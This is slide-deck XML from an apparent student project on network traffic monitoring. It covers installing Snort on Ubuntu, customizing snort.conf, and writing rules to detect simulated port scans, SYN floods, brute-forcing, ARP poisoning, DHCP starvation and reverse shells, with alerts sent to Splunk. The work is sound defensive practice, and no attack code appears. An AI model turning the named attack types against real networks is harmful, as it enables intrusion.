specialized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interfaces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tailored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to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monitor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Snort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alerts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Windows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event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logs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within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Splunk.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17192"/>
            <a:ext cx="3722370" cy="22273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59834"/>
            <a:ext cx="4538853" cy="16433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888860"/>
            <a:ext cx="3568827" cy="219837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592203"/>
            <a:ext cx="5756910" cy="133794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000" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Snort,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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Syslog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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-16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2000" spc="-17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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-17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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Forwarder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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-18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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Ubuntu2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600" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Installing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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Snort: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200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>First,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updated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Ubuntu2’s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repositories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upgraded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the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packages.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Next,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installed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Snort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on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Ubuntu2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with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the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command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b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-85" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-65" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>apt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-70" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-40" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-75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snort.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7500045"/>
            <a:ext cx="5856605" cy="101536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600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Backup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Customization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-14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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of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Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Configuration: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9600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="484"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-105">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-85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customize</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-70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Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-80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specific</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-100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needs,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-85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backed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-9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up</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>original</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-75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located </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/etc/snort/snort.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-2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using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-3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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-2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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/etc/snort/snort.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-15">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/etc/snort/snort.conf.back.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-30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Next, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cleared</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>preconfigured</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-70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rules</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>snort.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-8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and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>verified</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1150" spc="-75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removal.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29994"/>
            <a:ext cx="3927983" cy="23158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45964"/>
            <a:ext cx="3555238" cy="2471166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52" y="457200"/>
            <a:ext cx="6090920" cy="317500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E97031"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="64135" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3682365">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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886115"/>
            <a:ext cx="5970270" cy="118173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95">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Creating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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Custom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Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-13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Rules: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0000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pP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guideline,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u="sng" sz="1100" spc="-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The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Basics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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-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Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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Rule</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100"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Writing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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Guide</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>created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custom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rules</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in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25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>snort.conf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55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file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40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>detect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various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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>simulated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25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>attacks,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>including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40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>port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scanning,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SYN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-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>flood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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>attacks,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>FTP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40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>brute-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>forcing,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 spc="55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>starvation,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-60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ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>poisoning,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-65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shells</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-45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specific</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ports,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-75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suspicious </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>traffic,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-35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and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>traffic.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7225579"/>
            <a:ext cx="5671820" cy="81343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90">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-14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ARP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Poisoning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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Rule</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-13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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Alerts: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0000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>For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ARP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poisoning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rule,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we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added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preprocessor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variables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IP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50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>MAC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bindings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Snort </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>configuration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file. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>This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enabled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Snort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generate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alert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if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any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of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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these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bindings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changed.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44943"/>
            <a:ext cx="4495800" cy="7677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1827783"/>
            <a:ext cx="2869056" cy="108140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4180459"/>
            <a:ext cx="5943600" cy="30670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8049171"/>
            <a:ext cx="5245100" cy="1066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pc="-25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Anthony Johnson and Swapon Dhar</dc:creator>
  <dc:subject>RELOADED &gt;:)</dc:subject>
  <dc:title>Traffic Monitoring Final Project</dc:title>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-11T12:13:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-11T12:13:52Z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2024-07-11T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>3-Heights(TM) PDF Security Shell 4.8.25.2 (http://www.pdf-tools.com)</vt:lpwstr>
  </property>
</Properties>
</file>